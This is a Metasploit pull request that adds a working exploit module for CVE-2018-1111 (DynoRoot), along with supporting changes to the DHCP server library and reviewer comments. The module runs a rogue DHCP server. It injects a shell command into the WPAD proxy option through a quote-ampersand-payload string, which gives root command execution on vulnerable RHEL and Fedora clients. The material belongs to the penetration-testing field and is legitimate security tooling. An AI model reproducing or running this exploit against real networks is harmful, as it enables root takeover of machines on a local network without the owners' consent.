Add CVE-2018-1111 exploit #10059

Merged
merged 14 commits into from
Jun 12, 2018
1 change: 1 addition & 0 deletions lib/rex/proto/dhcp/constants.rb
@@ -23,6 +23,7 @@ module DHCP
OpDns = 6
OpHostname = 0x0c
OpURL = 0x72
OpProxyAutodiscovery = 0xfc
OpEnd = 0xff

PXEMagic = "\xF1\x00\x74\x7E"
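Review bot: a one-line comment on the new OpProxyAutodiscovery constant saying where the value comes from would help the next reader: 0xfc is option 252, the de facto (never RFC-standardised) WPAD proxy auto-discovery option, which is the option the new module sends and the client-side script mishandles. Without the comment the name and the magic number have to be looked up separately.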
7 changes: 4 additions & 3 deletions lib/rex/proto/dhcp/server.rb
@@ -128,7 +128,7 @@ def stop
def set_option(opts)
allowed_options = [
:serveOnce, :pxealtconfigfile, :servePXE, :relayip, :leasetime, :dnsserv,
:pxeconfigfile, :pxepathprefix, :pxereboottime, :router,
:pxeconfigfile, :pxepathprefix, :pxereboottime, :router, :proxy_auto_discovery,
:give_hostname, :served_hostname, :served_over, :serveOnlyPXE, :domain_name, :url
]

@@ -154,7 +154,7 @@ def send_packet(ip, pkt)
end

attr_accessor :listen_host, :listen_port, :context, :leasetime, :relayip, :router, :dnsserv
attr_accessor :domain_name
attr_accessor :domain_name, :proxy_auto_discovery
attr_accessor :sock, :thread, :myfilename, :ipstring, :served, :serveOnce
attr_accessor :current_ip, :start_ip, :end_ip, :broadcasta, :netmaskn
attr_accessor :servePXE, :pxeconfigfile, :pxealtconfigfile, :pxepathprefix, :pxereboottime, :serveOnlyPXE
@@ -292,12 +292,13 @@ def dispatch_request(from, buf)
end

# Options!
pkt << dhcpoption(OpProxyAutodiscovery, self.proxy_auto_discovery) if self.proxy_auto_discovery
pkt << dhcpoption(OpDHCPServer, self.ipstring)
pkt << dhcpoption(OpLeaseTime, [self.leasetime].pack('N'))
pkt << dhcpoption(OpSubnetMask, self.netmaskn)
pkt << dhcpoption(OpRouter, self.router)
pkt << dhcpoption(OpDns, self.dnsserv)
pkt << dhcpoption(OpDomainName, self.domain_name)
pkt << dhcpoption(OpDomainName, self.domain_name) if self.domain_name

if self.servePXE # PXE options
pkt << dhcpoption(OpPXEMagic, PXEMagic)
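Review bot: the `if self.domain_name` guard added to the OpDomainName line changes behaviour for every user of Rex::Proto::DHCP::Server, not only this module, and nothing in the PR title says so; a sentence in the description would help (presumably it is needed because the new module calls `deregister_options('DOMAINNAME', ...)`, leaving domain_name nil). On the new OpProxyAutodiscovery line, the value arrives from `set_option` with no length check; a DHCP option carries a single-octet length, so unless `dhcpoption` already enforces it, a value over 255 bytes would produce a malformed option. Rejecting such values in `set_option`, or at least documenting the limit there, is safer than emitting a bad packet.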
67 changes: 67 additions & 0 deletions modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb
@@ -0,0 +1,67 @@
@@ -0,0 +1,67 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::DHCPServer

def initialize(info = {})
super(update_info(info,
'Name' => 'DHCP Client Command Injection (DynoRoot)',
'Description' => %q{
This module exploits the DynoRoot vulnerability, a flaw in how the
NetworkManager integration script included in the DHCP client in
Red Hat Enterprise Linux 6 and 7, Fedora 28, and earlier
processes DHCP options. A malicious DHCP server, or an attacker on
the local network able to spoof DHCP responses, could use this flaw
to execute arbitrary commands with root privileges on systems using
NetworkManager and configured to obtain network configuration using
the DHCP protocol.
},
'Author' =>
[
'Felix Wilhelm', # Vulnerability discovery
'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>' # Metasploit module
],
'License' => MSF_LICENSE,
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
Contributor:
You can add a 'Privileged' => true, key to this hash somewhere, to show off that your exploit gives remote r00t.

Contributor Author:
Fixed
'References' =>
Contributor:
Feel free to include your own PoC in this array. :)

Contributor:
I'd add an AKA reference for DynoRoot, too.

Contributor Author:
Added
[
['CVE', '2018-1111'],
['EDB': '44652'],
['URL', 'https://github.com/kkirsche/CVE-2018-1111'],
['URL', 'https://twitter.com/_fel1x/status/996388421273882626?lang=en'],
['URL', 'https://access.redhat.com/security/vulnerabilities/3442151'],
['AKA', 'DynoRoot'],
['URL', 'https://dynoroot.ninja/'],
['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2018-1111'],
['URL', 'https://www.tenable.com/blog/advisory-red-hat-dhcp-client-command-injection-trouble'],
['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1111']
],
'PayloadType': 'cmd',
Contributor:
This should be a hash rocket for consistency

'PayloadType' => 'cmd',

Contributor Author:
Fixed
'Targets' => [ [ 'Automatic Target', { }] ],
'DefaultTarget' => 0,
'DisclosureDate' => 'May 15 2018'
))

deregister_options('DOMAINNAME', 'HOSTNAME', 'URL', 'FILENAME')
end

def exploit
hash = datastore.copy
start_service(hash)
@dhcp.set_option(proxy_auto_discovery: "#{Rex::Text.rand_text_alpha(6..12)}'&#{payload.encoded} #")

begin
while @dhcp.thread.alive?
sleep 2
end
ensure
stop_service
end
end
end
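Review bot: `['EDB': '44652']` in the References array is a syntax slip: with the colon it is a one-element array containing the hash `{EDB: '44652'}` rather than the `['EDB', '44652']` pair every other entry uses, so the EDB reference will not be resolved. It should read `['EDB', '44652']`. The same colon form on `'PayloadType': 'cmd'` yields the symbol key `:PayloadType` instead of the string key the rest of the info hash uses; that one was raised above and marked fixed, so please confirm the EDB line was corrected in the same pass.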